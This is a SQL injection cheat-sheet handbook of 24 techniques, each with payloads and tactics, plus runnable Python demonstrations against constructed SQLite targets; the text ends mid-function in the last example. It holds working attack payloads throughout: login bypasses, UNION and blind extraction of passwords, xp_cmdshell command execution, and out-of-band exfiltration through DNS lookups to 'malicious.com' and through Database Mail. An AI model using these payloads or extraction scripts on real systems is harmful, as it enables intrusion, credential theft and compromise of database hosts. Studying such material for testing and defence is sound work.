SQLi Cheatsheet

When Database Gates Are Left Ajar,
Chaos Writes Its Own Code

VIEH GROUP
SQL INJECTION CHEAT SHEET HANDBOOK

1. Union-Based SQL Injection:

description:
Appends a `UNION SELECT` to the application's own query so that rows from
another table come back in the same result set. Requires that the query's
output is rendered to the user and that the injected SELECT has the same
number of columns, with compatible types, as the original query.

payload:
' UNION SELECT null, username, password FROM users --

tactics:
Identify the number of columns in the target query: increase `ORDER BY n`
one step at a time until the database errors (the last n that succeeds is
the column count), or inject `UNION SELECT null`, `UNION SELECT null, null`
and so on until the query stops erroring.
Find a column that accepts strings by replacing one `null` at a time with a
string literal (`UNION SELECT 'a', null, null`); the position that does not
error is where extracted text can be placed. `ORDER BY` only gives the
column count, not the column types.
Craft the `UNION SELECT` payload accordingly, padding unused positions with
`null`. Comment syntax is database-specific: `-- ` (trailing space) or `#`
on MySQL, `--` on SQL Server, PostgreSQL and SQLite.
2. Error-Based SQL Injection:

description:
Forces the database to raise an error whose message contains a value chosen
by the attacker. Only works when the application echoes database error text
(or a stack trace) back to the user.

payload:
' AND 1=CONVERT(int, (SELECT @@version)) --

tactics:
Inject payloads that trigger a type-conversion error on the value you want
to read. On SQL Server the message reads "Conversion failed when converting
the nvarchar value '...' to data type int." with the value inside the quotes.
On MySQL the equivalent is `' AND extractvalue(1, concat(0x7e, version())) --`,
which echoes the value in an XPath syntax error (about 32 characters at a
time, so long values are read with `substring`).
Gather version, current user (`SELECT user_name()` on SQL Server, `user()`
on MySQL) and database name before moving on to tables and columns.

Social Media: viehgroup www.viehgroup.com support@viehgroup.com


3. Blind SQL Injection (Boolean-Based):

description:
Used when the application shows neither data nor error text from the
injected query, but its response still differs between a true and a false
injected condition (a result shown or not, a different page length, a
different status code). Each request answers one yes/no question.

payload:
' AND 1=1 --        (baseline: true)
' AND 1=2 --        (baseline: false)
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a' --

tactics:
Record the response for a known-true and a known-false condition first and
confirm that they differ; that difference is the oracle.
Prefer `AND` over `OR`: `OR 1=1` returns every row and hides the
per-condition difference.
Adjust the payload for each condition to test. This technique does not use
delays; for `SLEEP`-based payloads see 4.
4. Time-Based Blind SQL Injection:

description:
Used when true and false conditions produce identical responses. The
injected condition decides whether the database pauses before answering,
so the response time becomes the oracle.

payload:
' AND IF(1=1, SLEEP(5), 0) --                (MySQL)
'; WAITFOR DELAY '0:0:5' --                  (SQL Server, stacked query)
'; SELECT pg_sleep(5) --                     (PostgreSQL, stacked query)

tactics:
Send the payload with `1=1` and again with `1=2`; only the first should be
slow. Use `AND`, not `OR`: with `OR` the `SLEEP` runs once per row
examined, so the delay scales with table size and the test becomes
unreliable.
Pick a delay clearly above normal response-time jitter (5 seconds is
typical) and repeat borderline measurements before trusting them.
5. Out-of-Band SQL Injection (DNS Exfiltration):

description:
Makes the database server itself open a network connection to a host the
attacker controls; a DNS lookup is the channel that egress filtering almost
never blocks. Useful when the injection is completely blind and time-based
inference is too slow or too noisy.

payload:
'; EXEC xp_cmdshell('nslookup malicious.com') --
'; EXEC master..xp_dirtree '\\malicious.com\share' --

tactics:
The `xp_cmdshell` form requires command execution rights (see 9). The
`xp_dirtree` form only needs a UNC path: SQL Server resolves the host name
in order to reach the share, and that resolution is the DNS query you are
after, so it works without enabling `xp_cmdshell`.
Both are stacked queries, so the driver must allow multiple statements per
request.
Monitor the authoritative name server for `malicious.com` and log every
query. The presence of a lookup confirms the injection; the queried name
can carry data (see 17).
6. Second-Order SQL Injection:

description:
The payload is stored by one request (registration, profile edit) through a
query that handles it safely, then read back from the database and
concatenated into a different query later, where it executes. The first
sink looks fine in code review; the bug is in the second.

payload:
admin'--                 (as a new account's username)
'); DROP TABLE users; --

tactics:
Register `admin'-- ` and then use a feature that re-uses your stored
username in SQL, such as "change password": `UPDATE users SET password='...'
WHERE username='admin'-- '` now changes the admin's password, not yours.
The `DROP TABLE` form additionally needs stacked queries; the `--` form
does not.
Requires tracing where stored values flow back into queries, which is an
analysis of the application flow rather than a single-request test.
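A runnable illustration of the flow above, added here as an example and not taken from the handbook: the `users` table, the parameterized registration sink and the password-change function that concatenates the stored username are all constructed for this demonstration, with an in-memory SQLite database standing in for the real one.

```python
import sqlite3

# Added example, not from the handbook. The schema, the "users" rows and the two
# application functions are constructed to show a second-order injection end to end.


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return conn


def register(conn: sqlite3.Connection, username: str, password: str) -> None:
    # First sink: parameterized, so "admin'-- " is stored literally and
    # nothing is injected here. Code review of this function finds no bug.
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def change_password_vulnerable(conn: sqlite3.Connection, session_user: str, new_pw: str) -> str:
    # Second sink: the username is read back out of the database, treated as
    # trusted because "it came from the DB", and concatenated into a new query.
    (stored_name,) = conn.execute(
        "SELECT username FROM users WHERE username = ?", (session_user,)
    ).fetchone()
    sql = f"UPDATE users SET password = '{new_pw}' WHERE username = '{stored_name}'"
    conn.execute(sql)
    return sql  # returned so the statement that actually ran can be inspected


def change_password_safe(conn: sqlite3.Connection, session_user: str, new_pw: str) -> str:
    # Same flow, but the stored value goes back in as a bound parameter.
    (stored_name,) = conn.execute(
        "SELECT username FROM users WHERE username = ?", (session_user,)
    ).fetchone()
    sql = "UPDATE users SET password = ? WHERE username = ?"
    conn.execute(sql, (new_pw, stored_name))
    return sql


def password_of(conn: sqlite3.Connection, username: str) -> str:
    return conn.execute(
        "SELECT password FROM users WHERE username = ?", (username,)
    ).fetchone()[0]


def run_attack(change_password) -> tuple:
    """Register the payload as a username, then trigger the second-order sink.
    Returns (admin's password, attacker's password) after the attack."""
    attacker = "admin'-- "   # the comment swallows the rest of the WHERE clause
    conn = build_db()
    register(conn, attacker, "attacker-pw")
    change_password(conn, attacker, "pwned")
    return password_of(conn, "admin"), password_of(conn, attacker)


if __name__ == "__main__":
    print("vulnerable:", run_attack(change_password_vulnerable))  # ('pwned', 'attacker-pw')
    print("safe:      ", run_attack(change_password_safe))        # ('S3cret!', 'pwned')
```

The vulnerable path ends up running `UPDATE users SET password = 'pwned' WHERE username = 'admin'-- '`, so the admin's password changes and the attacker's own row is untouched; with the bound parameter the stored name is compared as a plain string and only the attacker's row changes.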

7. Exploiting Authentication:

description:
Bypasses a login form whose query is built from the submitted username and
password by making the WHERE clause true for a row the attacker chooses.

payload:
' OR '1'='1' --     (as username; any password)
admin'--            (as username; any password)

tactics:
`' OR '1'='1'` makes the WHERE clause match every row, so the application
logs you in as whichever user the database returns first. `admin'--`
comments out the password check and logs you in as a named user, which is
more predictable.
Only works when the password is checked inside the SQL query. If the
application fetches the stored hash and compares it in code, the injected
WHERE clause yields a row but not a login.
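The two payloads against a login query of the shape described above, run as an added example that is not part of the handbook: the `users` table, both login functions and the attempt list are constructed for the demonstration, with an in-memory SQLite database in place of the real one.

```python
import sqlite3

# Added example, not from the handbook. The users table, the two login functions
# and the payloads tried against them are constructed for this demonstration.


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "S3cret!"), ("alice", "wonderland")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    # The password is checked inside the SQL and both inputs are concatenated in:
    # this is exactly the query shape the payloads in this section target.
    sql = (f"SELECT username FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    # Same query with bound parameters: the quote and the comment marker are
    # just characters of the value being compared.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# (username, password) pairs. SQLite accepts a bare "--"; MySQL needs "-- " or "#".
ATTEMPTS = {
    "honest":     ("alice", "wonderland"),
    "tautology":  ("' OR '1'='1' --", "anything"),   # WHERE matches every row
    "named_user": ("admin'--", "anything"),          # comments out the password check
    "wrong_pw":   ("admin", "anything"),
}


def try_all(login) -> dict:
    conn = build_db()
    return {name: login(conn, user, pw) for name, (user, pw) in ATTEMPTS.items()}


if __name__ == "__main__":
    print(try_all(login_vulnerable))
    # {'honest': 'alice', 'tautology': 'admin', 'named_user': 'admin', 'wrong_pw': None}
    print(try_all(login_safe))
    # {'honest': 'alice', 'tautology': None, 'named_user': None, 'wrong_pw': None}
```

The tautology logs in as `admin` only because that row happens to be returned first; `admin'--` names the account explicitly, which is why it is the more reliable form on a real target.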

8. Time-Based Blind SQL Injection for Authentication Bypass:

description:
A time delay in a login form does not bypass authentication by itself; the
form either logs you in or it does not. It is used when the form returns the
same "invalid credentials" message for every failure and therefore offers no
boolean oracle: a measurable delay confirms that the field is injectable
before you commit to a bypass (7) or to extracting credentials (10).

payload:
' OR IF(1=1, SLEEP(5), 0) --

tactics:
Observe delays during authentication attempts: a slow response to `1=1` and
a fast one to `1=2` proves the injection.
Then either switch to a direct bypass (`admin'--`) or extract the password
column blind, character by character.
9. Command Execution:

description:
Executes arbitrary operating-system commands on the database host. Only some
databases offer this directly: `xp_cmdshell` on SQL Server and `COPY ... FROM
PROGRAM` on PostgreSQL (superuser only); on MySQL it is reached indirectly,
by writing a file with `INTO OUTFILE` or loading a user-defined function.

payload:
'; EXEC xp_cmdshell('whoami') --

tactics:
Requires stacked queries and a database login allowed to run the procedure;
on SQL Server that is `sysadmin` (or `CONTROL SERVER`), and `xp_cmdshell` is
disabled by default, so it must be enabled first (see 15).
Commands run as the SQL Server service account, so compromise of the
database host follows directly, and that host usually sits inside the
trusted network.
10. Time-Based Blind SQL Injection for Data Extraction:

description:
Extracts data when there is no visible output and no response difference, by
asking one yes/no question per request about one character of the target
value and reading the answer from the response time.

payload:
' AND IF(SUBSTRING((SELECT column_value FROM sensitive_data LIMIT 1),1,1)='a', SLEEP(5), 0) --
' AND IF(ASCII(SUBSTRING((SELECT column_value FROM sensitive_data LIMIT 1),1,1))>77, SLEEP(5), 0) --

tactics:
Observe delays in responses to infer true conditions.
Extract data character by character; testing `ASCII(...) > n` and halving
the range takes at most 7 requests per ASCII character instead of up to 95
equality tests.
Because every answer costs a full delay, find the value's length first
(`LENGTH((SELECT ...)) > n`) so you know when to stop, and keep the delay
as short as the network reliably allows.
11. Boolean-Based Blind SQL Injection for Data Extraction:

description:
Extracts data using true/false conditions: the same character-by-character
questions as in 10, but answered by a difference in the page rather than by
a delay, so each request is fast.

payload:
' AND SUBSTRING((SELECT column_value FROM sensitive_data LIMIT 1),1,1)='a' --
' AND ASCII(SUBSTRING((SELECT column_value FROM sensitive_data LIMIT 1),1,1))>77 --

tactics:
Utilize conditions to extract data character by character: use the ASCII
comparison and halve the range, or test one bit at a time with `&` (see 22).
Observe changes in application behavior by comparing the response body or
length against the known-true and known-false baselines from 3, not
against a single earlier request.
The subquery must return exactly one row (`LIMIT 1`, or `TOP 1` on SQL
Server), and `SUBSTRING` is `SUBSTR` on Oracle and SQLite.
12. Error-Based SQL Injection for Data Extraction:

description:
Exploits SQL errors to extract data: the value is pulled into a conversion
that must fail, and the error message carries it back in one request
instead of one request per character.

payload:
' AND 1=CONVERT(int, (SELECT TOP 1 column_value FROM sensitive_data)) --

tactics:
Inject payloads that provoke errors revealing sensitive data. The subquery
must return a single row; otherwise SQL Server answers "Subquery returned
more than 1 value" and you learn nothing. Use `TOP 1` and walk the rows
with `WHERE column_value NOT IN ('seen1', 'seen2')`.
Extract data from the error messages, one value per request. Numeric values
convert successfully and produce no error; prefix a letter
(`'x' + CONVERT(varchar, column_value)`) to force the failure.
13. UNION-Based SQL Injection for Multiple Columns:

description:
Expands the UNION query to extract data from several columns of another
table at once, or packs several values into the one column that is rendered
when the page displays only one.

payload:
' UNION SELECT column1, column2 FROM another_table --
' UNION SELECT CONCAT(username, ':', password), null FROM users --   (MySQL)
' UNION SELECT username + ':' + password, null FROM users --         (SQL Server)
' UNION SELECT username || ':' || password, null FROM users --       (PostgreSQL, Oracle, SQLite)

tactics:
Identify the number of columns and their types in the target query as in 1;
the UNION still needs exactly that many columns.
Extend the `UNION SELECT` statement accordingly. Put an impossible value in
the original WHERE clause (`' AND 1=2 UNION SELECT ...`) so only the injected
rows are shown, and learn table and column names from
`information_schema.tables` and `information_schema.columns` first.
14. Time-Based Blind SQL Injection for Boolean Conditions:

description:
Combines time-based and boolean-based techniques: a nested `IF` maps more
than two outcomes to different delays, so one request answers a multi-way
question instead of a single yes/no.

payload:
' AND IF(ASCII(SUBSTRING((SELECT column_value FROM sensitive_data LIMIT 1),1,1))>96, SLEEP(4), IF(ASCII(SUBSTRING((SELECT column_value FROM sensitive_data LIMIT 1),1,1))>64, SLEEP(2), 0)) --

tactics:
Introduces a layered approach: no delay, 2 seconds and 4 seconds here
distinguish roughly "digit or symbol", "upper-case" and "lower-case" in
one request.
Adjust conditions and sleep durations so that adjacent delays are far
enough apart to survive network jitter. With constant conditions such as
`1=1` and `1=2` the nesting adds nothing.
15. Enabling `xp_cmdshell` with `sp_configure`:

description:
`xp_cmdshell` is off by default on SQL Server; this stacked payload turns it
on through `sp_configure` so that 9 and 19 work. It is unrelated to
`OPENROWSET`, SQL Server's ad hoc remote-query function, which is gated by
the separate `Ad Hoc Distributed Queries` option.

payload:
'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --

tactics:
Enables `xp_cmdshell` to execute arbitrary commands on SQL Server.
Requires `sysadmin` (or the `ALTER SETTINGS` permission) on the connection
the application uses; a least-privilege application login cannot run
`sp_configure`. The change is server-wide and visible in the configuration,
which also makes it a detection opportunity for defenders.
16. Time-Based Blind SQL Injection (SQL Server `WAITFOR DELAY`):

description:
The SQL Server form of the delay oracle from 4: `WAITFOR DELAY` is a
statement, not a function, so it must be appended as a stacked query. This
has nothing to do with HTTP request smuggling, which is a desynchronization
between front-end and back-end HTTP parsers and not a SQL injection
technique.

payload:
' OR 1=1; WAITFOR DELAY '0:0:5'; --
'; IF (SELECT COUNT(*) FROM users WHERE username='admin') > 0 WAITFOR DELAY '0:0:5'; --

tactics:
The first form confirms stacked queries and the delay; the second makes the
delay conditional so that data can be inferred as in 10.
Use `AND 1=2` rather than `OR 1=1` in front of the `;` to avoid changing
what the original query returns.
17. Out-of-Band SQL Injection (DNS Exfiltration with Subdomains):

description:
Uses DNS exfiltration with dynamically generated subdomains: the value to
steal becomes the left-most label of a host name under a domain whose name
server the attacker runs, so the data arrives in that name server's query
log.

payload:
'; DECLARE @h varchar(64), @p varchar(300); SET @h = (SELECT TOP 1 CONVERT(varchar(64), CONVERT(varbinary(30), column_value), 2) FROM sensitive_data); SET @p = '\\' + @h + '.malicious.com\x'; EXEC master..xp_dirtree @p; --

tactics:
Dynamically generates subdomains to exfiltrate data. Stored-procedure
arguments in T-SQL must be constants or variables, so the name is assembled
into a variable first; `'nslookup ' + (SELECT ...)` passed straight to
`xp_cmdshell` is a syntax error.
Hex-encode the value (`CONVERT(..., 2)` above) because raw spaces, quotes
and non-ASCII bytes are not valid in host names; keep each label at 63
characters or fewer and the whole name under 253, and split long values
across several requests with a sequence number in a second label.
Beware of DNS caching: a repeated identical name may never reach your
server a second time.
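The receiving side of the DNS channel in 5 and 17, added here as an example and not part of the handbook: the domain `malicious.com` is the handbook's, but the label layout (`<seq>.<hex chunk>.malicious.com`), the 30-byte chunk size, the log-line format and the sample log are assumptions constructed for this example.

```python
import re
from binascii import unhexlify
from typing import Optional

# Added example, not from the handbook: the receiving side of the DNS channel.
# The label layout, chunk size and the query-log lines below are assumptions
# made for this example; only the domain name comes from the handbook.

EXFIL_DOMAIN = "malicious.com"
CHUNK_BYTES = 30        # 60 hex characters, under the 63-character label limit
LABEL_RE = re.compile(r"^(\d+)\.([0-9a-f]+)\." + re.escape(EXFIL_DOMAIN) + r"\.?$", re.I)


def encode_chunks(value: bytes) -> list:
    """Host names the injected query has to look up, in order. The SQL side
    produces the same layout with CONVERT(varchar, CONVERT(varbinary, ...), 2)
    on SQL Server or HEX() on MySQL, one chunk per request."""
    names = []
    for seq, off in enumerate(range(0, len(value), CHUNK_BYTES)):
        names.append(f"{seq}.{value[off:off + CHUNK_BYTES].hex()}.{EXFIL_DOMAIN}")
    return names


def extract_query_name(log_line: str) -> Optional[str]:
    # Constructed log format: "<time> <client> query: <name> IN <type>"; a real
    # resolver log differs, and only the queried name matters here.
    m = re.search(r"query:\s+(\S+)\s+IN\s+\w+", log_line)
    return m.group(1) if m else None


def reassemble(log_lines: list) -> bytes:
    """Collect chunks in any order, drop duplicates (resolvers retry), and stop
    at the first gap so a partial capture is reported rather than hidden."""
    chunks = {}
    for line in log_lines:
        m = LABEL_RE.match(extract_query_name(line) or "")
        if not m:
            continue                  # unrelated traffic to the same zone
        seq, hexdata = int(m.group(1)), m.group(2)
        if len(hexdata) % 2:
            continue                  # truncated label, ignore
        chunks.setdefault(seq, unhexlify(hexdata))
    out = b""
    for seq in range(len(chunks)):
        if seq not in chunks:
            break
        out += chunks[seq]
    return out


# Constructed query log: the chunks arrive out of order and one is duplicated.
SECRET = b"admin:S3cret!;alice:wonderland;bob:hunter2"
SAMPLE_LOG = (
    ["12:00:01 10.0.0.7 query: " + n + " IN A" for n in reversed(encode_chunks(SECRET))]
    + ["12:00:02 10.0.0.7 query: " + encode_chunks(SECRET)[0] + " IN A"]
    + ["12:00:03 10.0.0.9 query: www.malicious.com IN A"]   # noise
)

if __name__ == "__main__":
    print(encode_chunks(SECRET))
    print(reassemble(SAMPLE_LOG))   # b'admin:S3cret!;alice:wonderland;bob:hunter2'
```

The sequence label is what makes the channel usable at all: without it, chunks that are retried, cached or reordered by intermediate resolvers cannot be put back in order, and a 42-byte value already needs two lookups at this chunk size.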

18. Time-Based Blind SQL Injection with Subqueries:

description:
Uses a subquery inside the delay condition so that the thing being tested is
a value from another table rather than a constant; the subquery has to
return exactly one value and contain no delay of its own.

payload:
' AND IF((SELECT ASCII(SUBSTRING(column_value,1,1)) FROM sensitive_data LIMIT 1) > 77, SLEEP(5), 0) --

tactics:
Incorporates subqueries to fetch data; `LIMIT 1` (or `TOP 1`) keeps the
subquery scalar, and a `WHERE` clause inside it selects which row to read.
Delays in responses reveal the truth of the comparison; halve the range on
each request to settle a character in at most 7 requests.
19. Stacked-Query Command Execution with `xp_cmdshell`:

description:
Exploits SQL Server's `xp_cmdshell` for command execution through a stacked
query. It is not an error-based technique: the command's output is not
returned through the original query, so it has to be retrieved separately.

payload:
'; EXEC xp_cmdshell('whoami') --
'; CREATE TABLE dbo.cmdout (line varchar(8000)); INSERT INTO dbo.cmdout EXEC xp_cmdshell 'whoami'; --

tactics:
Executes arbitrary commands on the underlying system as the SQL Server
service account.
Requires enabling `xp_cmdshell` if not already configured (15) and a login
allowed to run it.
To see the output, capture it into a table as in the second payload and read
it back with a UNION (1) or through an error (12), or send it out of band
(5, 17).
20. Boolean-Based Blind SQL Injection with Conditional Responses:

description:
Exploits boolean conditions for data extraction on databases that have no
`IF()` function in expressions: `CASE WHEN` plays the same role on SQL
Server, PostgreSQL, Oracle and SQLite.

payload:
' AND (SELECT TOP 1 CASE WHEN SUBSTRING(column_value,1,1)='a' THEN 1 ELSE 0 END FROM sensitive_data)=1 --   (SQL Server)
' AND (SELECT CASE WHEN SUBSTR(column_value,1,1)='a' THEN 1 ELSE 0 END FROM sensitive_data LIMIT 1)=1 --      (PostgreSQL, SQLite)

tactics:
Utilizes boolean conditions for controlled data extraction, one character
(or one bit, see 22) per request.
Observe changes in responses for true and false conditions and compare them
with the baselines from 3.

21. Advanced UNION-Based SQL Injection with ORDER BY and NULLs:

description:
Exploits UNION-based injection with deliberate `ORDER BY` and `NULL`
handling: `ORDER BY n` counts the original query's columns (it errors as
soon as n exceeds the count), and `NULL` is type-compatible with every
column, so it fills the positions whose type you do not know yet.

payload:
' ORDER BY 3 --
' UNION SELECT null, column1, null FROM sensitive_data ORDER BY 2 --

tactics:
Utilizes NULLs and ORDER BY clauses for proper UNION injection: step
`ORDER BY n` upwards until it errors, then swap one `null` at a time for a
string literal to find which positions display text. On SQL Server,
PostgreSQL and Oracle a type mismatch is an error; MySQL and SQLite coerce
silently, so there every position accepts strings.
Orders the result set to match the existing query structure. In a UNION,
`ORDER BY` applies to the combined result and may only reference a column
position (or an alias from the first SELECT); on Oracle every SELECT needs a
`FROM` (`FROM dual` when there is no table).
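The column-count and UNION steps of 1, 13 and 21 carried out against a constructed target, added here as an example and not taken from the handbook: the `VulnerableApp` class, its `products` and `users` tables and the generic ok/error behaviour are assumptions made for this example, with an in-memory SQLite database in place of a real server.

```python
import sqlite3

# Added example, not from the handbook: the column-count and UNION steps of
# 1, 13 and 21 run against a constructed SQLite target. The tables and the
# VulnerableApp class are assumptions made for this example.


class VulnerableApp:
    """A category filter that concatenates user input into its query and
    hides database errors behind a generic error page."""

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self.conn.executescript("""
            CREATE TABLE products (name TEXT, price INTEGER, category TEXT);
            INSERT INTO products VALUES ('widget', 10, 'tools'), ('gizmo', 25, 'tools'),
                                        ('bolt', 1, 'hardware');
            CREATE TABLE users (username TEXT, password TEXT);
            INSERT INTO users VALUES ('admin', 'S3cret!'), ('alice', 'wonderland');
        """)

    def search(self, category: str):
        sql = f"SELECT name, price FROM products WHERE category = '{category}'"
        try:
            return "ok", self.conn.execute(sql).fetchall()
        except sqlite3.OperationalError:
            return "error", []          # all the user ever sees: ok or error


def count_columns_order_by(app, limit: int = 20) -> int:
    # ORDER BY n errors as soon as n exceeds the number of selected columns.
    for n in range(1, limit + 1):
        status, _ = app.search(f"x' ORDER BY {n} --")
        if status == "error":
            return n - 1
    raise RuntimeError("column count above limit")


def count_columns_union_null(app, limit: int = 20) -> int:
    # Alternative: grow a NULL list until the UNION stops failing.
    for n in range(1, limit + 1):
        nulls = ", ".join(["null"] * n)
        status, _ = app.search(f"x' UNION SELECT {nulls} --")
        if status == "ok":
            return n
    raise RuntimeError("column count above limit")


def dump_users(app) -> list:
    ncols = count_columns_order_by(app)
    # Pack several values into one displayed column (13) and pad the rest with
    # NULL (21). 'x' is an impossible category, so only injected rows come back.
    # SQLite coerces types silently; SQL Server, PostgreSQL and Oracle would need
    # the string in a position that really is a text column.
    cols = ["username || ':' || password"] + ["null"] * (ncols - 1)
    status, rows = app.search(f"x' UNION SELECT {', '.join(cols)} FROM users --")
    if status != "ok":
        raise RuntimeError("UNION rejected: wrong column count or type")
    return sorted(row[0] for row in rows)


if __name__ == "__main__":
    app = VulnerableApp()
    print(count_columns_order_by(app), count_columns_union_null(app))   # 2 2
    print(dump_users(app))   # ['admin:S3cret!', 'alice:wonderland']
```

Both counting methods land on the same number; the `ORDER BY` probe needs one request more than the count, the `NULL` probe exactly as many as the count, and neither reveals anything about types, which is why the string-literal probe described above is still a separate step.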

22. Blind SQL Injection with Bitwise Operations:

description:
Uses bitwise operations to infer information: each request tests one bit of
one character's ASCII code, so a character costs exactly 7 requests (8 for
non-ASCII bytes) with no state carried between requests.

payload:
' AND IF((SELECT ASCII(SUBSTRING(column_value,1,1)) FROM sensitive_data LIMIT 1) & 64 = 64, SLEEP(5), 0) --

tactics:
Utilizes bitwise operations to infer ASCII values character by character:
test the masks 1, 2, 4, 8, 16, 32 and 64 in turn and OR together the bits
that answer true. A mask with two bits set such as `& 65` only tells you
whether both are set, which is not a single-bit answer.
Observe delays in responses for true conditions; the same condition works
with a boolean oracle (11) and is faster there. Because the requests for one
character are independent, they can be sent in parallel, unlike a binary
search.
`IF(...)` here is MySQL's function; on SQL Server `IF` is a statement, so use
the stacked `IF (...) WAITFOR DELAY` form from 16 instead.
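The inference loops of 3, 4, 10, 11, 14, 18, 20 and 22 run against one constructed target, added here as an example and not part of the handbook. SQLite has no `SLEEP()`, so one is registered as a user-defined function to stand in for MySQL's; the tables, the `VulnerableApp` class, the `DELAY` value and the target subquery are assumptions made for this example.

```python
import sqlite3
import time

# Added example, not from the handbook: boolean and time-based inference loops
# against a constructed SQLite target. SLEEP() is a registered Python function
# standing in for MySQL's; tables, app and delay are assumptions for this example.

DELAY = 0.02   # seconds; a real attack uses several seconds to beat network jitter


class VulnerableApp:
    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        self.conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
        self.conn.executescript("""
            CREATE TABLE products (name TEXT, category TEXT);
            INSERT INTO products VALUES ('widget', 'tools'), ('bolt', 'hardware');
            CREATE TABLE users (username TEXT, password TEXT);
            INSERT INTO users VALUES ('admin', 'S3cret!'), ('alice', 'wonderland');
        """)

    def search(self, category: str) -> int:
        # Returns only a row count: the page shows "N results" and nothing else.
        sql = f"SELECT name FROM products WHERE category = '{category}'"
        try:
            return len(self.conn.execute(sql).fetchall())
        except sqlite3.OperationalError:
            return 0


# Two oracles answering the same question: "is this SQL condition true?"

def boolean_oracle(app, cond: str) -> bool:
    # 3/11/20: a true condition keeps the 'tools' row, a false one removes it.
    return app.search(f"tools' AND ({cond}) --") > 0


def time_oracle(app, cond: str) -> bool:
    # 4/10/18: the result is identical either way; only the delay differs.
    # CASE WHEN is the portable spelling of MySQL's IF(cond, SLEEP(n), 0).
    t0 = time.perf_counter()
    app.search(f"tools' AND (CASE WHEN ({cond}) THEN SLEEP({DELAY}) ELSE 0 END) = 0 --")
    return time.perf_counter() - t0 >= DELAY * 0.8


TARGET = "SELECT password FROM users WHERE username = 'admin'"   # scalar subquery


def char_by_bits(oracle, app, pos: int) -> str:
    # 22: one request per bit; the requests are independent of each other.
    code = 0
    for bit in range(7):
        mask = 1 << bit
        if oracle(app, f"(unicode(substr(({TARGET}), {pos}, 1)) & {mask}) = {mask}"):
            code |= mask
    return chr(code) if code else ""   # unicode('') is NULL, so every bit reads false


def char_by_bisect(oracle, app, pos: int) -> str:
    # 10/11/18: halve the ASCII range, at most 7 requests per character.
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(app, f"unicode(substr(({TARGET}), {pos}, 1)) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo) if lo else ""


def extract(oracle, app, per_char=char_by_bisect, max_len: int = 32) -> str:
    out = ""
    for pos in range(1, max_len + 1):
        ch = per_char(oracle, app, pos)
        if not ch:                     # past the end of the value
            break
        out += ch
    return out


if __name__ == "__main__":
    app = VulnerableApp()
    print(extract(boolean_oracle, app))                        # S3cret!
    print(extract(boolean_oracle, app, char_by_bits))          # S3cret!
    print(extract(time_oracle, app, char_by_bits, max_len=3))  # S3c
```

The per-character functions never look at the response body, only at the oracle's yes/no answer, which is why the same loop works unchanged over a page difference or over a delay; swapping `unicode`/`substr` for `ASCII`/`SUBSTRING` and `LIMIT 1` for `TOP 1` is all that changes between database engines.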

23. Advanced Out-of-Band SQL Injection (SMTP Exfiltration):

description:
Leverages SQL Server Database Mail to send the extracted value out as an
e-mail, a high-bandwidth channel when the server is allowed to reach a mail
relay.

payload:
'; DECLARE @b varchar(4000); SET @b = 'Data: ' + (SELECT TOP 1 column_value FROM sensitive_data); EXEC msdb.dbo.sp_send_dbmail @profile_name='your_profile', @recipients='your_email@example.com', @subject='SQL Injection', @body=@b; --

tactics:
Sends data via SMTP e-mail. As with every stored procedure, the arguments
must be constants or variables, so the body is assembled into `@b` first
rather than concatenated on the `EXEC` line.
Requires Database Mail to be enabled, a mail profile the login may use
(`your_profile` must be an existing profile name) and membership in
`msdb`'s `DatabaseMailUserRole` or higher. Every message also leaves a
record in `msdb.dbo.sysmail_allitems`, which defenders can monitor.
24. Error-Based SQL Injection with INFORMATION_SCHEMA:

description:
Extracts schema information (table and column names) through error
messages, so that later UNION and blind payloads target real names instead
of guesses.

payload:
' AND 1=CONVERT(int, (SELECT TOP 1 column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='users')) --
' AND 1=CONVERT(int, (SELECT TOP 1 column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='users' AND column_name NOT IN ('id'))) --

tactics:
Extracts information about column names one per request: comparing the
name with an integer forces it into an `int` conversion, which fails and
echoes the name. The bare `1=(SELECT column_name ...)` form relies on the
implicit conversion and fails with "Subquery returned more than 1 value" as
soon as the table has more than one column, which reveals nothing.
Utilize the errors to reveal details iteratively: add each recovered name
to the `NOT IN` list until the query returns no error, meaning no rows are
left. Start with `INFORMATION_SCHEMA.TABLES` (`table_name`) to find the
tables first. The same views exist on MySQL and PostgreSQL (lower-case
`information_schema`); Oracle uses `ALL_TABLES` and `ALL_TAB_COLUMNS`.
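The request/parse loop behind 2, 12 and 24, added here as an example and not taken from the handbook. Nothing here talks to a real SQL Server: `FakeTarget` is a constructed stand-in that only mimics the two error messages involved (the conversion error that leaks a value and the multi-row error that leaks nothing); its column list and page HTML are assumptions made for this example, while the message wording and the `TOP 1` / `NOT IN` payload shape are the real SQL Server behaviour the section describes.

```python
import re

# Added example, not from the handbook. FakeTarget is a constructed stand-in for
# a SQL Server-backed page and mimics only the two relevant error messages; its
# column list and HTML are assumptions made for this example.

CONVERSION_RE = re.compile(
    r"Conversion failed when converting the n?varchar value '(.*?)' to data type int\."
)
MULTI_ROW = "Subquery returned more than 1 value"


def convert_payload(subquery: str) -> str:
    # Wrap the scalar subquery so that its string result is forced into an int.
    return f"' AND 1=CONVERT(int, ({subquery})) --"


def next_column_subquery(table: str, seen: list) -> str:
    # TOP 1 keeps it scalar; NOT IN walks the remaining names one per request.
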